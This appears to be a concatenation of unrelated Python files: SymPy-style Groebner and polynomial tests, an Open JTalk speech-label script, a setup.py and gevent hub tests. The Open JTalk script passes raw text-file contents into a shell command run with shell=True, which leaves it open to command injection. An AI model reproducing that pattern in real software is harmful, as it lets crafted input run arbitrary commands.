G = groebner([x**2 + y**2 - 1, x*y - 2])
Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
r = 0
assert reduced(f, G) == (Q, r)
assert G.reduce(f) == (Q, r)
assert reduced(f, G, auto=False)[1] != 0
assert G.reduce(f, auto=False)[1] != 0
assert G.contains(f) is True
assert G.contains(f + 1) is False
assert reduced(1, [1], x) == ([1], 0)
pytest.raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
assert not groebner([], x, y, z)
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
[(1 + x**2).as_poly(x, y), (-1 + y**4).as_poly(x, y)]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
[(-1 + y**4).as_poly(x, y, z, order='grevlex'), (z**3).as_poly(x, y, z, order='grevlex'),
(1 + x**2).as_poly(x, y, z, order='grevlex')]
assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
G = groebner(F, x, y, z, modulus=7)
assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
Q, r = reduced(f, G, x, y, z, modulus=7, polys=True)
assert sum((q*g for q, g in zip(Q, G.polys)), r) == f.as_poly(modulus=7)
F = [x*y - 2*y, 2*y**2 - x**2]
assert groebner(F, x, y) == \
[x**2 - 2*y**2, x*y - 2*y, y**3 - 2*y]
assert groebner(F, x, y, order='grlex') == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner(F, y, x, order='grevlex') == \
[x**3 - 2*x**2, -x**2 + 2*y**2, x*y - 2*y]
assert groebner(F, order='grevlex', field=True) == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner([1], x) == [1]
pytest.raises(ComputationFailed, lambda: groebner([1]))
assert groebner([x**2 - 1, x**3 + 1], method='buchberger') == [x + 1]
assert groebner([x**2 - 1, x**3 + 1], method='f5b') == [x + 1]
pytest.raises(ValueError, lambda: groebner([x, y], method='unknown'))
F = [x**2 - x - 1, (2*x - 1) * y - (x**10 - (1 - x)**10)]
assert groebner(F, x, y, method='buchberger') == [x**2 - x - 1, y - 55]
assert groebner(F, x, y, method='f5b') == [x**2 - x - 1, y - 55]
# issue sympy/sympy#11623
pytest.raises(ValueError,
lambda: groebner([0.144*x*y + 0.018*x**2 + 0.05*x - 1.577,
0.072*y**2 + 0.036*x*y + 0.05*y - 1.423],
x, y))
def test_set_order():
F = [a + b + c + d, a*b + a*d + b*c + b*d, a*b*c + a*b*d + a*c*d + b*c*d, a*b*c*d - 1]
G = groebner(F, a, b, c, d, order=grlex)
B = [4*a + 3*d**9 - 4*d**5 - 3*d,
4*b + 4*c - 3*d**9 + 4*d**5 + 7*d,
4*c**2 + 3*d**10 - 4*d**6 - 3*d**2,
4*c*d**4 + 4*c - d**9 + 4*d**5 + 5*d,
d**12 - d**8 - d**4 + 1]
assert groebner(F, a, b, c, d, order=lex) == B
assert G.set_order(lex) == B
assert G.set_order(grlex) == G
F = [9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
-72*t*x**7 - 252*t*x**6 + 192*t*x**5 + 1260*t*x**4 + 312*t*x**3 - 404*t*x**2 - 576*t*x +
108*t - 72*x**7 - 256*x**6 + 192*x**5 + 1280*x**4 + 312*x**3 - 576*x + 96]
G = groebner(F, t, x, order=grlex)
B = [203577793572507451707*t + 627982239411707112*x**7 - 666924143779443762*x**6 -
10874593056632447619*x**5 + 5119998792707079562*x**4 + 72917161949456066376*x**3 +
20362663855832380362*x**2 - 142079311455258371571*x + 183756699868981873194,
9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9]
assert groebner(F, t, x, order=lex) == B
assert G.set_order(lex) == B
F = [x**2 - x - 3*y + 1, -2*x + y**2 + y - 1]
G = groebner(F, x, y, order=lex)
B = [x**2 - x - 3*y + 1, y**2 - 2*x + y - 1]
assert groebner(F, x, y, order=grlex) == B
assert G.set_order(grlex) == B
assert G.set_order(grlex).set_order(lex) == G
assert G == [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]
F = [x**2 - 2*y + 1, x + y/2]
G = groebner(F, x, y, order=grlex)
B = [y**2 - 8*y + 4, x + y/2]
assert G == B
assert G.set_order(lex) == reversed(B)
G = groebner([x**3 - y**3], x, y, order='grlex')
pytest.raises(NotImplementedError, lambda: G.set_order('lex'))
def test_dimension_and_independent_sets():
assert groebner((x, y)).dimension == 0
assert groebner((x**3 + y**2,)).dimension == 1
assert groebner((x, y, z)).dimension == 0
assert groebner((x, y, z), x, y, z, t).dimension == 1
assert groebner((x*y - z, y*z - x, x*y - y)).dimension == 0
assert groebner((x**2 - 2*x*z + 5, x*y**2 + y*z**3, 3*y**2 - 8*z**2)).dimension == 0
assert groebner((x + y, x - y)).independent_sets == [[]]
assert groebner((x + y, 2*x + 2*y)).independent_sets == [[y]]
assert groebner((x**2 + y**2,)).independent_sets == [[y]]
assert groebner((x**3*y**2 - 1,)).independent_sets == [[y], [x]]
assert groebner((x**3 - y**3,)).independent_sets == [[y]]
assert groebner((y - x, y - x - 1)).independent_sets is None
assert groebner((x*y - z**2 - z, x**2 + x - y*z, x*z - y**2 - y)).independent_sets == [[z]]
assert groebner((x*y*z,)).independent_sets == [[y, z], [x, z], [x, y]]
assert groebner((x**2 - 1, (x - 1)*y, (x + 1)*z)).independent_sets == [[z], [y]]
assert groebner((x**2 + y**2 + z**2, x + y - z, y + z**2)).independent_sets == [[]]
assert groebner((x*z - 2*y + 1, y*z - 1 + z, y*z + x*y*z + z)).independent_sets == [[]]
assert groebner((x**3*y*z - x*z**2, x*y**2*z - x*y*z, x**2*y**2 - z)).independent_sets == [[z], [y], [x]]
assert groebner((x*y**2 - z - z**2, x**2*y - y, y**2 - z**2)).independent_sets == [[x]]
assert groebner((x*y + z - 1, x - y - z**2, x**2 - 2*y**2 + 1)).independent_sets == [[]]
assert groebner((z*x - y - x + x*y, y*z - z + x**2 + y*x**2, x - x**2 + y, z)).independent_sets == [[]]
assert groebner((x*y - x*z + y**2, y*z - x**2 + x**2*y, x - x*y + y)).independent_sets == [[z]]
assert groebner((y*z + x**2 + z, x*y*z + x*z - y**3, x*z + y**2)).independent_sets == [[]]
assert groebner((x**2 + z**2*y + y*z, y**2 - z*x + x, x*y + z**2 - 1)).independent_sets == [[]]
assert groebner((x + y**2*z - 2*y**2 + 4*y - 2*z - 1, -x + y**2*z - 1)).independent_sets == [[z], [y]]
assert groebner((x, y - 1, z)).independent_sets == [[]]
# H. Kredel and V. Weispfennig. Computing dimension and independent sets for
# polynomial ideals. J. Symbolic Computation, 6(1):231–247, November 1988.
# Ex. 4.1.
V = A31, A32, A21, B1, B2, B3, C3, C2 = symbols('A31 A32 A21 B1 B2 B3 C3 C2')
S = (C2 - A21, C3 - A31 - A32, B1 + B2 + B3 - 1,
B2*C2 + B3*C3 - QQ(1, 2), B2*C2**2 + B3*C3**2 - QQ(1, 3),
B3*A32*C2 - QQ(1, 6))
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[C3, C2], [B3, C2], [B2, C3], [B2, B3], [A32, C3], [A32, B2]]
assert G.dimension == 2
# Ex. 4.3
V = B1, A32, B2, B3, A, C3, C2, B = symbols('B1 A32 B2 B3 A C3 C2 B')
S = (B1 + B2 + B3 - A - B,
B2*C2 + B3*C3 - QQ(1, 2) - B/2 - B**2 + A*B,
B2*C2**2 + B3*C3**2 - A/3 - A*B**2 + 4*B/3 + B**2 + B**3,
B3*A32*C2 - A/6 - A*B/2 - A*B**2 + 2*B/3 + B**2 + B**3,
B2*C2**3 + B3*C3**3 - QQ(1, 4) - B/4 - 5*B**2/2 - 3*B**3/2 - B**4 + A*B + A*B**3,
B3*C3*A32*C2 - QQ(1, 8) - 3*B/8 - 7*B**2/4 - 3*B**3/2 - B**4 + A*B/2 + A*B**2/2 + A*B**3,
B3*A32*C2**2 - QQ(1, 12) - B/12 - 7*B**2/6 - 3*B**3/2 - B**4 + 2*A*B/3 + A*B**2 + A*B**3,
QQ(1, 24) + 7*B/24 + 13*B**2/12 + 3*B**3/2 + B**4 - A*B/3 - A*B**2 - A*B**3)
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[B3, C2], [A32, C3, C2], [A32, B2, C3], [A32, B2, B3]]
assert G.dimension == 3
# Ex. 4.4
V = L7, L6, L4, L1, L5, L3, L2 = symbols('L7 L6 L4 L1 L5 L3 L2')
S = (L1*(L4 - L5/2 + L6),
(2*L1**2/7 - L4)*(-10*L1 + 5*L2 - L3),
(2*L1**2/7 - L4)*(3*L4 - L5 + L6),
(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*(-3*L1 + 2*L2) + 21*(7*L7 - 2*L1*L4 + 3*L1**3/7),
(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*(2*L4 - 2*L5) + (7*L7 - 2*L1*L4 + 3*L1**3/7)*(-45*L1 + 15*L2 - 3*L3),
2*(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*L7 + (7*L7 - 2*L1*L4 + 3*L1**3/7)*(12*L4 - 3*L5 + 2*L6),
(L1*(5*L1 - 3*L2 + L3))*(2*L2 - L1) + 7*(L1*(2*L6 - 4*L4)),
(L1*(5*L1 - 3*L2 + L3))*L3+7*(L1*(2*L6 - 4*L4)),
(L1*(5*L1 - 3*L2 + L3))*(-2*L4 - 2*L5) + (L1*(2*L6 - 4*L4))*(2*L2 - 8*L1) + 42*L1*L7,
(L1*(5*L1 - 3*L2 + L3))*(8*L5/3 + 6*L6) + (L1*(2*L6 - 4*L4))*(11*L1 - 17*L2/3 + 5*L3/3) - 84*L1*L7,
15*L7*(L1*(5*L1 - 3*L2 + L3)) + (L1*(2*L6 - 4*L4))*(5*L4 - 2*L5) + L1*L7*(-120*L1 + 30*L2 - 6*L3)/2,
-3*(L1*(5*L1 - 3*L2 + L3))*L7 + (L1*(2*L6 - 4*L4))*(-L4/2 + L5/4 - L6/2) + L1*L7/2*(24*L1 - 6*L2),
3*(L1*(2*L6 - 4*L4))*L7 + L1*L7*(40*L4 - 8*L5 + 4*L6)/2)
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[L5, L3, L2], [L6, L3]]
assert G.dimension == 3
# Algebraic Solution of Nonlinear Equation Systems in REDUCE, p.7.
V = ax, bx, cx, gx, jx, lx, mx, nx, q = symbols('ax bx cx gx jx lx mx nx q')
S = (ax*q - lx*q - mx, ax - gx*q - lx, bx*q**2 + cx*q - jx*q - nx,
q*(-ax*q + lx*q + mx), q*(-ax + gx*q + lx))
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[cx, jx, lx, mx, nx, q], [cx, gx, jx, lx, mx, nx], [bx, cx, gx, jx, lx, nx]]
assert G.dimension == 6
def test_GroebnerBasis():
F = [x*y - 2*y, 2*y**2 - x**2]
G = groebner(F, x, y, order='grevlex')
assert groebner(F + [0], x, y, order='grevlex') == G
assert G.args == ((y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y), x, y)
H = [y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
P = [h.as_poly(x, y, order='grevlex') for h in H]
assert isinstance(G, GroebnerBasis) is True
assert len(G) == 3
assert G[0] == H[0] and not G[0].is_Poly
assert G[1] == H[1] and not G[1].is_Poly
assert G[2] == H[2] and not G[2].is_Poly
assert G[1:] == H[1:] and not any(g.is_Poly for g in G[1:])
assert G[:2] == H[:2] and not any(g.is_Poly for g in G[1:])
assert G.exprs == H
assert G.polys == P
assert G.gens == (x, y)
assert G.domain == ZZ
assert G.order == grevlex
assert G == H
assert G == tuple(H)
assert G == P
assert G == tuple(P)
assert G
G = groebner(F, x, y, order='grevlex', polys=True)
assert G[0] == P[0] and G[0].is_Poly
assert G[1] == P[1] and G[1].is_Poly
assert G[2] == P[2] and G[2].is_Poly
assert G[1:] == P[1:] and all(g.is_Poly for g in G[1:])
assert G[:2] == P[:2] and all(g.is_Poly for g in G[1:])
assert tuple(G) == ((y**3 - 2*y).as_poly(x, y, order='grevlex'),
(x**2 - 2*y**2).as_poly(x, y, order='grevlex'),
(x*y - 2*y).as_poly(x, y, order='grevlex'))
G = groebner(F, x, y, order='grevlex', polys=True)
assert hash(G) == hash(groebner([_.as_poly() for _ in F], order='grevlex'))
assert (G == 1) is False
def test_Poly_from_expr_recursive():
assert (x*(x**2 + x - 1)**2).as_poly() == (x**5 + 2*x**4 - x**3 -
2*x**2 + x).as_poly()
assert (x + y).as_poly(wrt=y) == (x + y).as_poly(y, x)
assert (x + sin(x)).as_poly(wrt=sin(x)) == (x + sin(x)).as_poly(sin(x), x)
assert (2*(y + z)**2 - 1).as_poly() == (2*y**2 + 4*y*z +
2*z**2 - 1).as_poly()
assert (x*(y + z)**2 - 1).as_poly() == (x*y**2 + 2*x*y*z +
x*z**2 - 1).as_poly()
assert (2*x*(y + z)**2 - 1).as_poly() == (2*x*y**2 + 4*x*y*z +
2*x*z**2 - 1).as_poly()
assert (2*(y + z)**2 - x - 1).as_poly() == (2*y**2 + 4*y*z + 2*z**2 -
x - 1).as_poly()
assert (x*(y + z)**2 - x - 1).as_poly() == (x*y**2 + 2*x*y*z +
x*z**2 - x - 1).as_poly()
assert (2*x*(y + z)**2 - x - 1).as_poly() == (2*x*y**2 + 4*x*y*z + 2 *
x*z**2 - x - 1).as_poly()
assert (x*y + (x + y)**2 + (x + z)**2).as_poly() == (2*x*z + 3*x*y + y**2 +
z**2 + 2*x**2).as_poly()
assert (x*y*(x + y)*(x + z)**2).as_poly() == (x**3*y**2 + x*y**2*z**2 +
y*x**2*z**2 + 2*z*x**2*y**2 +
2*y*z*x**3 + y*x**4).as_poly()
assert ((x + y)**2).as_poly(x) == (x**2 + 2*x*y + y**2).as_poly(x)
assert ((x + y)**2).as_poly(x, expand=True) == (x**2 + 2*x*y +
y**2).as_poly(x)
assert ((x + y)**2).as_poly(y) == (x**2 + 2*x*y + y**2).as_poly(y)
assert ((x + y)**2 - y**2 - 2*x*y).as_poly() == (x**2).as_poly(x, y)
e = x**2 + (1 + sqrt(2))*x + 1
assert (e.as_poly(x, greedy=False) ==
e.as_poly(x, domain=QQ.algebraic_field(sqrt(2))))
# issue sympy/sympy#12400
assert ((1/(1 + sqrt(2))).as_poly(x) ==
(1/(1 + sqrt(2))).as_poly(x, domain=QQ.algebraic_field(1/(1 + sqrt(2)))))
# issue sympy/sympy#19755
assert ((x + (2*x + 3)**2/5 + Rational(6, 5)).as_poly() ==
(4*x**2/5 + 17*x/5 + 3).as_poly(domain=QQ))
assert (((x + 1)**2)/2).as_poly() == (x**2/2 + x +
Rational(1, 2)).as_poly(domain=QQ)
def test_keep_coeff():
u = Mul(2, x + 1, evaluate=False)
assert _keep_coeff(Integer(1), x) == x
assert _keep_coeff(Integer(-1), x) == -x
assert _keep_coeff(Float(1.0), x) == 1.0*x
assert _keep_coeff(Float(-1.0), x) == -1.0*x
assert _keep_coeff(Integer(1), 2*x) == 2*x
assert _keep_coeff(Integer(2), x/2) == x
assert _keep_coeff(Integer(2), sin(x)) == 2*sin(x)
assert _keep_coeff(Integer(2), x + 1) == u
assert _keep_coeff(x, 1/x) == 1
assert _keep_coeff(x + 1, Integer(2)) == u
def test_poly_matching_consistency():
# Test for sympy/sympy#5514
assert I * x.as_poly() == (I*x).as_poly(x)
assert x.as_poly() * I == (I*x).as_poly(x)
def test_sympyissue_5786():
f, g = z - I*t, x - I*y
assert factor(expand(f*g), extension=[I]) == f*g
assert factor(expand(f**2*g), extension=[I]) == f**2*g
assert factor(expand(f*g**3), extension=[I]) == f*g**3
# issue sympy/sympy#18895
e = (x - 1)*(y - 1)
assert factor(expand(e)) == e
assert factor(expand(e), extension=[I]) == e
def test_noncommutative():
class Foo(Expr):
is_commutative = False
e = x/(x + x*y)
c = 1/(1 + y)
fe, fc = map(Foo, [e, c])
assert cancel(fe) == fc
assert cancel(e + fe) == c + fc
assert cancel(e*fc) == c*fc
def test_to_rational_coeffs():
assert to_rational_coeffs(
(x**3 + y*x**2 + sqrt(y)).as_poly(x, domain=EX)) is None
assert to_rational_coeffs((((x**2 - 1)*(x - 2)*y).subs({x: x*(1 + sqrt(2))})).as_poly(x, y, domain=EX)) is None
assert to_rational_coeffs((x**5 + sqrt(2)*x**2 + 1).as_poly(x, domain=EX)) is None
def test_sympyissue_8754():
z = 0.0001*(x*(x + (4.0*y))) + 0.0001*(y*(x + (4.0*y)))
w = expand(z)
v = factor(w)
assert v == Mul(Float('10000.0', 15),
Float('0.0001', 15)*x + Float('0.0001', 15)*y,
Float('0.0001', 15)*x + Float('0.00040000000000000002', 15)*y,
evaluate=False)
assert expand(v) == w
def test_factor_terms():
# issue sympy/sympy#7067
assert factor_list(x*(x + y)) == (1, [(x, 1), (x + y, 1)])
assert sqf_list(x*(x + y)) == (1, [(x**2 + x*y, 1)])
def test_sympyissue_8210():
p = Integer(0).as_poly(x)
p2 = p.copy()
assert id(p) != id(p2)
assert p == p2
def test_sympyissue_11775():
e = y**4 + x*y**3 + y**2 + x*y
assert factor_list(e, y) == (1, [(y, 1), (y**2 + 1, 1), (x + y, 1)])
def test_sympyissue_5602():
(Integral(x, (x, 0, 1))*x + x**2).as_poly(x)
def test_sympyissue_15798():
o1 = (x + y).as_poly(x, y, z)
o2 = o1.copy()
assert o1 == o2
p = (x + sqrt(2)).as_poly(x)
assert p == p.copy()
@pytest.mark.timeout(20)
def test_sympyissue_19670():
(E**100000000).as_poly()
def test_sympyissue_8810():
e = y**3 + y**2*sqrt(x) + y + x
p = e.as_poly(y)
c = e.as_poly(y, composite=True)
assert c == e.as_poly(y, domain=ZZ.inject(x, sqrt(x)))
assert p.as_poly(y, composite=True) == c
def test_sympyissue_8695():
e = (x**2 + 1) * (x - 1)**2 * (x - 2)**3 * (x - 3)**3
r = (1, [(x**2 + 1, 1), (x - 1, 2), (x**2 - 5*x + 6, 3)])
assert sqf_list(e) == r
assert e.as_poly().sqf_list() == r
# regression test from the issue thread, not related to the issue
e = (x + 2)**2 * (y + 4)**5
assert sqf(e) == sqf(e.expand()) == e
def test_sympyissue_19070():
e = (5*x).as_poly(modulus=19)
r = e*2
assert r == (10*x).as_poly(modulus=19)
assert r.get_modulus() == 19
def test_sympyissue_19161():
assert sympify('x**2').as_poly().simplify() == (x**2).as_poly()
def test_sympyissue_20484():
assert (x*y*z).as_poly().eval(x, y*z) == (y**2*z**2).as_poly()
def test_sympyissue_20640():
p = (x**2 + y).as_poly(field=True)
p0 = y.as_poly(x, y, field=True)
assert div(p, p0) == (Integer(1).as_poly(x, y, field=True),
(x**2).as_poly(x, y, field=True))
assert div(p.as_expr(), p0.as_expr(), field=True) == (1, x**2)
def test_sympyissue_20973():
e = exp(1 + O(x))
assert cancel(e) == e
def test_sympyissue_20985():
assert degree(1.0 + I*x/y, domain=CC.frac_field(y)) == 1
def test_sympyissue_21180():
f = (x**4 + 6*x**3 + 4*x**2 - 30*x - 45).as_poly()
assert factor(f) == (x + 3)**2*(x**2 - 5)
def test_sympyissue_20444():
e = 33*log(x) + log(8) + 58
assert LT(e) == 3*log(2)
def test_sympyissue_13029():
assert sqf_part(a*(x - 1)**2*(y - 3)**3, x, y) == x*y - 3*x - y + 3
@pytest.mark.timeout(5)
def test_sympyissue_21760():
_, r = (x**2016 - x**2015 + x**1008 + x**1003 +
1).as_poly().div((x - 1).as_poly())
assert r == Integer(3).as_poly(x)
def test_sympyissue_21761():
t = tan(pi/7)
assert factor(-exp(x)*t + 1,
extension=True) == Mul(-1, exp(x) - 5*t - t**5/7 + 3*t**3,
t, evaluate=False)
def test_sympyissue_22093():
expr = ((2*y**3*sin(x/y)**2 + x)**2*(y*(-6*y**2*sin(x/y)**2 +
4*y*x*sin(x/y)*cos(x/y)) /
(2*y**3*sin(x/y)**2 + x)**2 +
1/(2*y**3*sin(x/y)**2 + x)) /
(4*y*(2*y**2*(3*y*sin(x/y) - 2*x*cos(x/y))**2*sin(x/y)**2 /
(2*y**3*sin(x/y)**2 + x) - 3*y*sin(x/y)**2 +
4*x*sin(x/y)*cos(x/y) - (3*y*sin(x/y) - 2*x*cos(x/y))*sin(x/y) +
x**2*sin(x/y)**2/y - x**2*cos(x/y)**2/y)))
res = -(4*x**2*y**2*sin(x/y)*cos(x/y) + x**2 +
8*x*y**5*sin(x/y)**3*cos(x/y) - 2*x*y**3*sin(x/y)**2 -
8*y**6*sin(x/y)**4)/(-4*x**3*sin(x/y)**2 + 4*x**3*cos(x/y)**2 -
8*x**2*y**3*sin(x/y)**4 -
24*x**2*y**3*sin(x/y)**2*cos(x/y)**2 -
24*x**2*y*sin(x/y)*cos(x/y) +
48*x*y**4*sin(x/y)**3*cos(x/y) +
24*x*y**2*sin(x/y)**2 - 24*y**5*sin(x/y)**4)
assert cancel(expr).equals(res)
def test_sympyissue_22673():
e = x**7 - x
p = e.as_poly(modulus=7)
f = x*(x + 1)*(x + 2)*(x + 3)*(x + 4)*(x + 5)*(x + 6)
assert factor(e, modulus=7) == factor(p) == f
assert factor_list(e, modulus=7) == (1, [(x + i, 1) for i in range(7)])
assert factor_list(p) == (1, [((x + i).as_poly(modulus=7), 1)
for i in range(7)])
|
py | b40b2752ff868a76c19797235b2157b4ac9fb364 |
# import
import os
import sys
import glob
import argparse
import subprocess
from pprint import pprint
def main():
# 引数を設定・取得
parser = argparse.ArgumentParser(formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument('InputFolderPath', help = 'Specify a folder with text')
parser.add_argument('OpenJTalkOption', help = 'Specify the argument to pass to Open JTalk used when creating the label')
args = parser.parse_args()
# カレントフォルダ
current_folder = os.path.dirname(__file__) + '/'
print(current_folder)
# 入力フォルダ
input_folder = args.InputFolderPath.strip().rstrip('/') + '/'
# 出力フォルダ
output_folder = current_folder + 'tools/segment_adapt/voices/'
# Open JTalk
open_jtalk = current_folder + 'tools/open_jtalk/bin/open_jtalk'
open_jtalk_dic = current_folder + 'tools/open_jtalk/dic/'
open_jtalk_option = args.OpenJTalkOption.strip()
open_jtalk_log = current_folder + 'tmp.log'
# フォルダ作成
os.makedirs(output_folder, exist_ok = True)
os.makedirs(output_folder + 'labels/full/', exist_ok = True)
os.makedirs(output_folder + 'labels/mono/', exist_ok = True)
print('Input folder: ' + input_folder)
print('Output folder: ' + output_folder)
print()
# テキストファイルのリスト
textfile_list = sorted(glob.glob(input_folder + '*.txt'))
# テキストファイルごとに
index = 0
for textfile in textfile_list:
# index を足す
index += 1
# 拡張子なしファイル名
textfile_id = os.path.splitext(os.path.basename(textfile))[0]
# ファイルを開く
with open(textfile, encoding = 'utf-8') as fp:
# ファイルを読み込む
text = fp.read()
# 改行を削除
text = text.replace('\n', ' ')
text = text.replace('{player}', '')
print('Text: ' + text)
# OpenJTalk を実行
open_jtalk_command = 'echo "' + text + '" | ' + open_jtalk + ' -x ' + open_jtalk_dic + ' ' + open_jtalk_option + ' -ot ' + open_jtalk_log + ' 2> /dev/null'
subprocess.run(open_jtalk_command, shell = True)
# 出力されたログを開く
with open(open_jtalk_log, encoding = 'utf-8') as log:
# ログを読み込む
lines = log.readlines()
# ログが空でないなら
if ''.join(lines) != "":
# 音声ファイルの出力先
voice_old = output_folder + textfile_id + '.raw'
voice_new = output_folder + 'voices_' + str(index).zfill(4) + '.raw'
print('Voice: ' + voice_old)
print('Voice rename: ' + voice_new)
# 音声ファイルを連番のファイル名にリネーム
os.rename(voice_old, voice_new)
# フルコンテキスト (full) ラベルの出力先
label_full = output_folder + 'labels/full/voices_' + str(index).zfill(4) + '.lab'
print('Label (full): ' + label_full)
# 単音 (mono) ラベルの出力先
label_mono = output_folder + 'labels/mono/voices_' + str(index).zfill(4) + '.lab'
print('Label (mono): ' + label_mono)
# フルコンテキストラベルを書き込む
for line in lines:
if line.find('0000') >= 0 and line.find('xx/') >= 0:
with open(label_full, mode = 'a', encoding = 'utf-8') as full_rfp:
full_rfp.write(line)
# 単音ラベルを書き込む
# 先ほど書きこんだフルコンテキストラベルを開く
with open(label_full, mode = 'rt', encoding = 'utf-8') as full_wfp:
# 行ごとに
for line in full_wfp:
mono = []
words = line.split(' ')
# 文字ごと
for word in words:
if '+' in word:
ws1 = word.split('+')[0]
ws2 = ws1.split('-')[1]
mono.append(ws2)
_str = ' '.join(map(str, mono))
else:
mono.append(word)
# 単音ラベルを書き込み
mono_str = ' '.join(map(str, mono))
# print(mono_str)
with open(label_mono, mode = 'a', encoding = 'utf-8') as mono_wfp:
mono_wfp.write(mono_str + '\n')
# ログが空の場合、処理をスキップする
else:
# インデックスを減らす
index -= 1
# ボイスファイルを削除
os.remove(output_folder + textfile_id + '.raw')
print()
# ログを削除
os.remove(open_jtalk_log)
if __name__ == '__main__':
main()
|
py | b40b276af89295d973ed8fae76949971dad95ddc | #!/usr/bin/env python
from distutils.core import setup
setup(name='dlcs-iris-data',
version='0',
description='DLCS Iris session data library',
author='Digirati Ltd',
packages=['dlcs_iris_data',],
license='MIT',
install_requires=[
'iris-data==0'
],
dependency_links=[
'git+https://github.com/digirati-co-uk/iris-data.git#egg=iris-data-0',
],
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python 3',
'Programming Language :: Python 3 :: Only',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
|
py | b40b28efc82124b66aa2260f10935dd13874582b | # Copyright (c) 2009 AG Projects
# Author: Denis Bilenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
import time
import greentest
import greentest.timing
import gevent
from gevent import socket
from gevent.hub import Waiter, get_hub
from gevent._compat import NativeStrIO
DELAY = 0.1
class TestCloseSocketWhilePolling(greentest.TestCase):
def test(self):
with self.assertRaises(Exception):
sock = socket.socket()
self._close_on_teardown(sock)
t = get_hub().loop.timer(0, sock.close)
try:
sock.connect(('python.org', 81))
finally:
t.close()
gevent.sleep(0)
class TestExceptionInMainloop(greentest.TestCase):
def test_sleep(self):
# even if there was an error in the mainloop, the hub should continue to work
start = time.time()
gevent.sleep(DELAY)
delay = time.time() - start
delay_range = DELAY * 0.9
self.assertTimeWithinRange(delay, DELAY - delay_range, DELAY + delay_range)
error = greentest.ExpectedException('TestExceptionInMainloop.test_sleep/fail')
def fail():
raise error
with get_hub().loop.timer(0.001) as t:
t.start(fail)
self.expect_one_error()
start = time.time()
gevent.sleep(DELAY)
delay = time.time() - start
self.assert_error(value=error)
self.assertTimeWithinRange(delay, DELAY - delay_range, DELAY + delay_range)
class TestSleep(greentest.timing.AbstractGenericWaitTestCase):
def wait(self, timeout):
gevent.sleep(timeout)
def test_simple(self):
gevent.sleep(0)
class TestWaiterGet(greentest.timing.AbstractGenericWaitTestCase):
def setUp(self):
super(TestWaiterGet, self).setUp()
self.waiter = Waiter()
def wait(self, timeout):
with get_hub().loop.timer(timeout) as evt:
evt.start(self.waiter.switch, None)
return self.waiter.get()
class TestWaiter(greentest.TestCase):
def test(self):
waiter = Waiter()
self.assertEqual(str(waiter), '<Waiter greenlet=None>')
waiter.switch(25)
self.assertEqual(str(waiter), '<Waiter greenlet=None value=25>')
self.assertEqual(waiter.get(), 25)
waiter = Waiter()
waiter.throw(ZeroDivisionError)
assert re.match('^<Waiter greenlet=None exc_info=.*ZeroDivisionError.*$', str(waiter)), str(waiter)
self.assertRaises(ZeroDivisionError, waiter.get)
waiter = Waiter()
g = gevent.spawn(waiter.get)
gevent.sleep(0)
self.assertTrue(str(waiter).startswith('<Waiter greenlet=<Greenlet "Greenlet-'))
g.kill()
@greentest.skipOnCI("Racy on CI")
class TestPeriodicMonitoringThread(greentest.TestCase):
def _reset_hub(self):
hub = get_hub()
try:
del hub.exception_stream
except AttributeError:
pass
if hub._threadpool is not None:
hub.threadpool.join()
hub.threadpool.kill()
del hub.threadpool
